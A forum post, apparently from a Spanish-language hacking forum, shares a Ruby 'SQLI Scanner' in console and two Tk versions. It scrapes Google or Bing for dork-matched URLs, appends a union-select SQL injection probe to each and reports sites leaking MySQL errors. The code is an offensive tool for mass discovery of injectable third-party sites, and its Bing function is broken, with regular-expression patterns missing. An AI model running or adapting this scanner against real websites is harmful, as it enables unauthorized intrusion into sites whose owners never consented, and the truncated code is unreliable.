
Ruby [Ruby] SQLI Scanner 0.4


Doddy

Un script sencillo en Ruby para buscar páginas vulnerables a SQLi usando Google o Bing.

Versión de consola:

Code:
>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions 

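# Fetches +web+ with a browser-like User-Agent and returns the response body.
#
# The string is parsed into a URI and opened through that object
# (OpenURI::OpenRead) instead of being handed to Kernel#open. Kernel#open
# treats a string starting with "|" as a command to spawn, and the callers in
# this file pass links scraped from search-result pages, i.e. text chosen by
# third parties.
#
# @param web [String] absolute http/https URL
# @return [String] the body, or the literal "Error" when anything raises
def toma(web)
  agente = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  URI.parse(web).open(agente).read
rescue
  # Deliberately best-effort: an unparsable URL, a non-HTTP scheme, a network
  # failure or an HTTP error status all collapse into the same marker.
  "Error"
end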


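# Performs an HTTPS GET on +web+ with a browser-like User-Agent and returns
# the response body.
#
# Certificate verification is enabled (VERIFY_PEER). With VERIFY_NONE any
# certificate is accepted, so a host on the network path could substitute the
# HTML that the callers in this file go on to scan for links.
#
# Nothing is rescued here: URI, socket and TLS errors propagate to the caller.
#
# @param web [String] absolute https URL
# @return [String] response body
def toma_ssl(web)
  destino = URI.parse(web)
  cliente = Net::HTTP.new(destino.host, destino.port)
  cliente.use_ssl = true
  cliente.verify_mode = OpenSSL::SSL::VERIFY_PEER
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0" }
  cliente.get(destino.request_uri, cabeceras).body
end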


# Sends +arg+ as the body of a POST to the path of +web+ with a browser-like
# User-Agent. use_ssl is never set on the connection, so the request goes out
# without TLS whatever the scheme of +web+ is.
#
# @param web [String] target URL
# @param arg [String] request body
# @return [String] response body, or the literal "Error" when anything raises
def tomar(web, arg)
  destino = URI(web)
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  conexion = Net::HTTP.new(destino.host, destino.port)
  conexion.post(destino.path, arg, cabeceras).body
rescue
  "Error"
end

# Cuts every URL in +pages+ (nested arrays are flattened) right after an "=",
# discarding the value that followed it. Entries without "=" are dropped.
# The first capture group is greedy, so on a single-line URL the cut lands on
# the last "=".
#
# @param pages [Array] URLs, possibly nested
# @return [Array<String>] the truncated URLs, in input order
def cortar(pages)
  patron = /(.*)=(.*)/
  pages.flatten.each_with_object([]) do |pagina, recortadas|
    next unless pagina =~ patron

    recortadas << Regexp.last_match(1) + "="
  end
end


# Queries www.google.com.ar for +dork+ and collects the result links found in
# the returned HTML.
#
# +pages+ is a String; one request is made per element of the string range
# "1"..pages. The offset is advanced before each request, so requests carry
# start=10, 20, ... Only the first space of +dork+ is turned into "+".
#
# @param dork [String] search expression
# @param pages [String] upper bound of the page range
# @return [Array<String>] URI-decoded links with duplicates removed
def google(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  encontrados = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    html.scan(/(?<="r"><. href=")(.+?)"/).flatten.each do |href|
      # Result anchors wrap the destination as url?q=<target>&sa...
      next unless href =~ /url\?q=(.*)&sa/

      encontrados.push(URI::decode(Regexp.last_match(1)))
    end
  end
  encontrados.uniq
end

# Fallback link collector: requests the same Google result pages as google
# but takes every URI that URI::extract finds in the HTML and keeps those
# matching cache:<x>:<y>+, rebuilding each as "http://" + <y>.
#
# @param dork [String] search expression (only its first space becomes "+")
# @param pages [String] upper bound of the string range "1"..pages
# @return [Array<String>] URI-decoded links with duplicates removed
def google_recursive(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  recogidos = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    URI::extract(html).each do |candidato|
      next unless candidato =~ /cache:(.*?):(.*?)\+/

      recogidos.push(URI::decode("http://" + Regexp.last_match(2)))
    end
  end
  recogidos.uniq
end

# Collects result links from Bing for +dork+, one request per element of the
# string range "1"..pages, and returns them URI-decoded and de-duplicated.
# Links matching http://778802.r.msn.com/ are left out.
#
# NOTE(review): both `code.scan(/` calls below have lost their pattern. The
# regular-expression literal appears to have been stripped when this page was
# extracted (presumably it contained HTML markup), so the function does not
# parse as shown. The patterns are not reconstructed here.
def bing(dork,pages)

guardo = []
# Only the first space of the dork is replaced.
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	# The offset is advanced before the request, so requests carry first=10, 20, ...
	contador+=10

	# Sent over plain http through toma, which returns "Error" on failure.
	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

# Prints the command-line help: syntax line, the four options and an example.
#
# @return [nil]
def uso
  lineas = [
    "\n[+] Sintax : ruby scanner.rb   \n\n",
    "-search_bing : Find in Bing\n",
    "-search_google : Find in Google\n",
    "-scan_bing : Find SQLI in Bing\n",
    "-scan_google : Find SQLI in Google\n",
    "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
  ]
  print(*lineas)
end

# Prints the program banner.
#
# @return [nil]
def head
  titulo = "\n\n-- == SQLI Scanner 0.4 == --\n\n"
  $stdout.print(titulo)
end

# Prints the closing copyright line.
#
# @return [nil]
def copyright
  pie = "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  $stdout.print(pie)
end

# Command-line driver: reads <option> <dork> <pages> from ARGV, prints the
# banner, dispatches on the option and prints the footer.
opcion, dork, pages = ARGV[0], ARGV[1], ARGV[2]

head

# Prints every collected link on its own line.
listar = lambda do |enlaces|
  enlaces.flatten.each { |enlace| print "[+] Link : " + enlace + "\n" }
end

# Requests each truncated URL with the fixed suffix -1+union+select+1-- and
# reports [OK] when the response contains MySQL's "different number of
# columns" error text. Server side, these requests stand out in access logs
# by that literal suffix; the check cannot succeed where the query uses bound
# parameters or the application does not echo database errors to the client.
probar = lambda do |enlaces|
  enlaces.flatten.each do |enlace|
    print "[+] Link : " + enlace
    begin
      respuesta = toma(enlace + "-1+union+select+1--")
      if respuesta =~ /The used SELECT statements have a different number of columns/
        print " [OK]\n\a\a"
      else
        print " [FAIL]\n"
      end
    rescue
      print " [FAIL]\n"
    end
  end
end

if opcion && dork && pages
  case opcion
  when "-search_bing"
    print "\n[+] Searching in Bing ...\n\n"
    links = bing(dork, pages)
    print "[+] Pages Count : " + links.count.to_s + "\n\n"
    print "[-] Links not found\n" if links.count.zero?
    listar.call(links)
    print "\n[+] Finished\n"
  when "-search_google"
    print "\n[+] Searching in Google ...\n\n"
    links = google(dork, pages)
    if links.count.zero?
      # Second attempt through the cache-link extractor.
      print "[+] Searching in Google again ...\n\n"
      links = google_recursive(dork, pages)
    end
    print "[+] Pages Count : " + links.count.to_s
    print "[-] Links not found" if links.count.zero?
    listar.call(links)
    print "\n[+] Finished\n"
  when "-scan_bing"
    print "\n[+] Searching in Bing ...\n\n"
    links = cortar(bing(dork, pages))
    print "[+] Pages Count : " + links.count.to_s + "\n\n"
    print "[-] Links not found\n" if links.count.zero?
    probar.call(links)
    print "\n[+] Finished\n"
  when "-scan_google"
    print "\n[+] Searching in Google ...\n\n"
    links = cortar(google(dork, pages))
    if links.count.zero?
      print "[+] Searching in Google again ...\n\n"
      links = cortar(google_recursive(dork, pages))
    end
    print "[+] Pages Count : " + links.count.to_s + "\n\n"
    print "[-] Links not found" if links.count.zero?
    probar.call(links)
    print "\n[+] Finished\n"
  else
    print "[-] Bad Option"
  end
else
  # Any of the three arguments missing: show the help text only.
  uso
end

copyright


#The End ?
Versión Tk para Google:

Code:
>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

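# Fetches +web+ with a browser-like User-Agent and returns the response body.
#
# The string is parsed into a URI and opened through that object
# (OpenURI::OpenRead) instead of being handed to Kernel#open. Kernel#open
# treats a string starting with "|" as a command to spawn, and the callers in
# this file pass links scraped from search-result pages, i.e. text chosen by
# third parties.
#
# @param web [String] absolute http/https URL
# @return [String] the body, or the literal "Error" when anything raises
def toma(web)
  agente = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  URI.parse(web).open(agente).read
rescue
  # Deliberately best-effort: an unparsable URL, a non-HTTP scheme, a network
  # failure or an HTTP error status all collapse into the same marker.
  "Error"
end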


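# Performs an HTTPS GET on +web+ with a browser-like User-Agent and returns
# the response body.
#
# Certificate verification is enabled (VERIFY_PEER). With VERIFY_NONE any
# certificate is accepted, so a host on the network path could substitute the
# HTML that the callers in this file go on to scan for links.
#
# Nothing is rescued here: URI, socket and TLS errors propagate to the caller.
#
# @param web [String] absolute https URL
# @return [String] response body
def toma_ssl(web)
  destino = URI.parse(web)
  cliente = Net::HTTP.new(destino.host, destino.port)
  cliente.use_ssl = true
  cliente.verify_mode = OpenSSL::SSL::VERIFY_PEER
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0" }
  cliente.get(destino.request_uri, cabeceras).body
end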


# Sends +arg+ as the body of a POST to the path of +web+ with a browser-like
# User-Agent. use_ssl is never set on the connection, so the request goes out
# without TLS whatever the scheme of +web+ is.
#
# @param web [String] target URL
# @param arg [String] request body
# @return [String] response body, or the literal "Error" when anything raises
def tomar(web, arg)
  destino = URI(web)
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  conexion = Net::HTTP.new(destino.host, destino.port)
  conexion.post(destino.path, arg, cabeceras).body
rescue
  "Error"
end

# Cuts every URL in +pages+ (nested arrays are flattened) right after an "=",
# discarding the value that followed it. Entries without "=" are dropped.
# The first capture group is greedy, so on a single-line URL the cut lands on
# the last "=".
#
# @param pages [Array] URLs, possibly nested
# @return [Array<String>] the truncated URLs, in input order
def cortar(pages)
  patron = /(.*)=(.*)/
  pages.flatten.each_with_object([]) do |pagina, recortadas|
    next unless pagina =~ patron

    recortadas << Regexp.last_match(1) + "="
  end
end


# Queries www.google.com.ar for +dork+ and collects the result links found in
# the returned HTML.
#
# +pages+ is a String; one request is made per element of the string range
# "1"..pages. The offset is advanced before each request, so requests carry
# start=10, 20, ... Only the first space of +dork+ is turned into "+".
#
# @param dork [String] search expression
# @param pages [String] upper bound of the page range
# @return [Array<String>] URI-decoded links with duplicates removed
def google(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  encontrados = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    html.scan(/(?<="r"><. href=")(.+?)"/).flatten.each do |href|
      # Result anchors wrap the destination as url?q=<target>&sa...
      next unless href =~ /url\?q=(.*)&sa/

      encontrados.push(URI::decode(Regexp.last_match(1)))
    end
  end
  encontrados.uniq
end

# Fallback link collector: requests the same Google result pages as google
# but takes every URI that URI::extract finds in the HTML and keeps those
# matching cache:<x>:<y>+, rebuilding each as "http://" + <y>.
#
# @param dork [String] search expression (only its first space becomes "+")
# @param pages [String] upper bound of the string range "1"..pages
# @return [Array<String>] URI-decoded links with duplicates removed
def google_recursive(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  recogidos = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    URI::extract(html).each do |candidato|
      next unless candidato =~ /cache:(.*?):(.*?)\+/

      recogidos.push(URI::decode("http://" + Regexp.last_match(2)))
    end
  end
  recogidos.uniq
end

# Collects result links from Bing for +dork+, one request per element of the
# string range "1"..pages, and returns them URI-decoded and de-duplicated.
# Links matching http://778802.r.msn.com/ are left out.
#
# NOTE(review): both `code.scan(/` calls below have lost their pattern. The
# regular-expression literal appears to have been stripped when this page was
# extracted (presumably it contained HTML markup), so the function does not
# parse as shown. The patterns are not reconstructed here.
def bing(dork,pages)

guardo = []
# Only the first space of the dork is replaced.
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	# The offset is advanced before the request, so requests carry first=10, 20, ...
	contador+=10

	# Sent over plain http through toma, which returns "Error" on failure.
	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

#

# Tk front end for the Google scan: a 300x320 window with two entry fields
# (dork, pages), a text widget used as a console, and a Search button whose
# callback runs the whole search-and-probe sequence.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

# Caption for the dork entry.
TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry holding the search expression.
dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

# Caption for the pages entry.
TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

# Entry holding the upper bound of the result-page range.
pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

# Text widget that receives all progress and result lines.
console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
   background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

	# NOTE(review): these assignments rebind the outer `dork` / `pages` locals
	# from the TkEntry widgets to Strings, so a second click would call
	# .value on a String -- confirm.
	dork = dork.value.to_s
	pages = pages.value.to_s

	console.insert("end",  "[+] Searching in Google ...\n\n")
	
	# cortar truncates each collected URL after an "=".
	links = cortar(google(dork,pages))

	# No links from the first collector: retry through google_recursive.
	if links.count.to_s=="0"
		console.insert("end",  "[+] Searching in Google again ...\n\n")
		links = cortar(google_recursive(dork,pages))
	end

	console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

	if links.count.to_s=="0"
		console.insert("end", "[-] Links not found")
	end

	# Each truncated URL is requested with the fixed suffix
	# -1+union+select+1-- and marked [OK] when the response contains MySQL's
	# "different number of columns" error text. Server side, these requests
	# stand out in access logs by that literal suffix; the check cannot
	# succeed where the query uses bound parameters or the application does
	# not echo database errors to the client.
	links.flatten.each do |link|
		console.insert("end", "[+] Link : "+link)
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				console.insert("end"," [OK]\n\a\a")
			else
				console.insert("end"," [FAIL]\n")
			end
		rescue
			console.insert("end", " [FAIL]\n")
		end
	end
	
	console.insert("end",  "\n[+] Finished")
	
}
place('relx'=>0.3,'rely'=>0.9)
end

# Hands control to the Tk event loop.
Tk.mainloop

#The End ?
Una imagen :

scannersqli_google_ruby.jpg


Versión Tk para Bing:

Code:
>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

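# Fetches +web+ with a browser-like User-Agent and returns the response body.
#
# The string is parsed into a URI and opened through that object
# (OpenURI::OpenRead) instead of being handed to Kernel#open. Kernel#open
# treats a string starting with "|" as a command to spawn, and the callers in
# this file pass links scraped from search-result pages, i.e. text chosen by
# third parties.
#
# @param web [String] absolute http/https URL
# @return [String] the body, or the literal "Error" when anything raises
def toma(web)
  agente = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  URI.parse(web).open(agente).read
rescue
  # Deliberately best-effort: an unparsable URL, a non-HTTP scheme, a network
  # failure or an HTTP error status all collapse into the same marker.
  "Error"
end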


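# Performs an HTTPS GET on +web+ with a browser-like User-Agent and returns
# the response body.
#
# Certificate verification is enabled (VERIFY_PEER). With VERIFY_NONE any
# certificate is accepted, so a host on the network path could substitute the
# HTML that callers go on to scan for links.
#
# Nothing is rescued here: URI, socket and TLS errors propagate to the caller.
#
# @param web [String] absolute https URL
# @return [String] response body
def toma_ssl(web)
  destino = URI.parse(web)
  cliente = Net::HTTP.new(destino.host, destino.port)
  cliente.use_ssl = true
  cliente.verify_mode = OpenSSL::SSL::VERIFY_PEER
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0" }
  cliente.get(destino.request_uri, cabeceras).body
end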


# Sends +arg+ as the body of a POST to the path of +web+ with a browser-like
# User-Agent. use_ssl is never set on the connection, so the request goes out
# without TLS whatever the scheme of +web+ is.
#
# @param web [String] target URL
# @param arg [String] request body
# @return [String] response body, or the literal "Error" when anything raises
def tomar(web, arg)
  destino = URI(web)
  cabeceras = { "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0" }
  conexion = Net::HTTP.new(destino.host, destino.port)
  conexion.post(destino.path, arg, cabeceras).body
rescue
  "Error"
end

# Cuts every URL in +pages+ (nested arrays are flattened) right after an "=",
# discarding the value that followed it. Entries without "=" are dropped.
# The first capture group is greedy, so on a single-line URL the cut lands on
# the last "=".
#
# @param pages [Array] URLs, possibly nested
# @return [Array<String>] the truncated URLs, in input order
def cortar(pages)
  patron = /(.*)=(.*)/
  pages.flatten.each_with_object([]) do |pagina, recortadas|
    next unless pagina =~ patron

    recortadas << Regexp.last_match(1) + "="
  end
end


# Queries www.google.com.ar for +dork+ and collects the result links found in
# the returned HTML.
#
# +pages+ is a String; one request is made per element of the string range
# "1"..pages. The offset is advanced before each request, so requests carry
# start=10, 20, ... Only the first space of +dork+ is turned into "+".
#
# @param dork [String] search expression
# @param pages [String] upper bound of the page range
# @return [Array<String>] URI-decoded links with duplicates removed
def google(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  encontrados = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    html.scan(/(?<="r"><. href=")(.+?)"/).flatten.each do |href|
      # Result anchors wrap the destination as url?q=<target>&sa...
      next unless href =~ /url\?q=(.*)&sa/

      encontrados.push(URI::decode(Regexp.last_match(1)))
    end
  end
  encontrados.uniq
end

# Fallback link collector: requests the same Google result pages as google
# but takes every URI that URI::extract finds in the HTML and keeps those
# matching cache:<x>:<y>+, rebuilding each as "http://" + <y>.
#
# @param dork [String] search expression (only its first space becomes "+")
# @param pages [String] upper bound of the string range "1"..pages
# @return [Array<String>] URI-decoded links with duplicates removed
def google_recursive(dork, pages)
  consulta = dork.sub(/ /, "+")
  inicio = 0
  recogidos = []
  ("1"..pages).each do
    inicio += 10
    html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + consulta + "&start=" + inicio.to_s)
    URI::extract(html).each do |candidato|
      next unless candidato =~ /cache:(.*?):(.*?)\+/

      recogidos.push(URI::decode("http://" + Regexp.last_match(2)))
    end
  end
  recogidos.uniq
end

# Collects result links from Bing for +dork+, one request per element of the
# string range "1"..pages, and returns them URI-decoded and de-duplicated.
# Links matching http://778802.r.msn.com/ are left out.
#
# NOTE(review): both `code.scan(/` calls below have lost their pattern. The
# regular-expression literal appears to have been stripped when this page was
# extracted (presumably it contained HTML markup), so the function does not
# parse as shown. The patterns are not reconstructed here.
def bing(dork,pages)

guardo = []
# Only the first space of the dork is replaced.
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	# The offset is advanced before the request, so requests carry first=10, 20, ...
	contador+=10

	# Sent over plain http through toma, which returns "Error" on failure.
	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

#

# Tk front end for the Bing scan: a 300x320 window with two entry fields
# (dork, pages), a text widget used as a console, and a Search button whose
# callback runs the whole search-and-probe sequence.
window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

# Caption for the dork entry.
TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

# Entry holding the search expression.
dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

# Caption for the pages entry.
TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

# Entry holding the upper bound of the result-page range.
pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

# Text widget that receives all progress and result lines.
console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
   background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

	# NOTE(review): these assignments rebind the outer `dork` / `pages` locals
	# from the TkEntry widgets to Strings, so a second click would call
	# .value on a String -- confirm.
	dork = dork.value.to_s
	pages = pages.value.to_s

	console.insert("end", "[+] Searching in Bing ...\n\n")
	
	# cortar truncates each collected URL after an "=".
	links = cortar(bing(dork,pages))

	console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

	if links.count.to_s=="0"
		console.insert("end","[-] Links not found\n")
	end

	# Each truncated URL is requested with the fixed suffix
	# -1+union+select+1-- and marked [OK] when the response contains MySQL's
	# "different number of columns" error text. Server side, these requests
	# stand out in access logs by that literal suffix; the check cannot
	# succeed where the query uses bound parameters or the application does
	# not echo database errors to the client.
	links.flatten.each do |link|
		console.insert("end", "[+] Link : "+link)
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				console.insert("end"," [OK]\n\a\a")
			else
				console.insert("end", " [FAIL]\n")
			end
		rescue
			console.insert("end"," [FAIL]\n")
		end
	end
	
	console.insert("end",  "\n[+] Finished")
	
}
place('relx'=>0.3,'rely'=>0.9)
end

# Hands control to the Tk event loop.
Tk.mainloop

#The End ?
Una imagen :

scannersqli_bing_ruby.jpg


Eso es todo.

 
Re: [Ruby] SQLI Scanner 0.4

Nice one Codder

 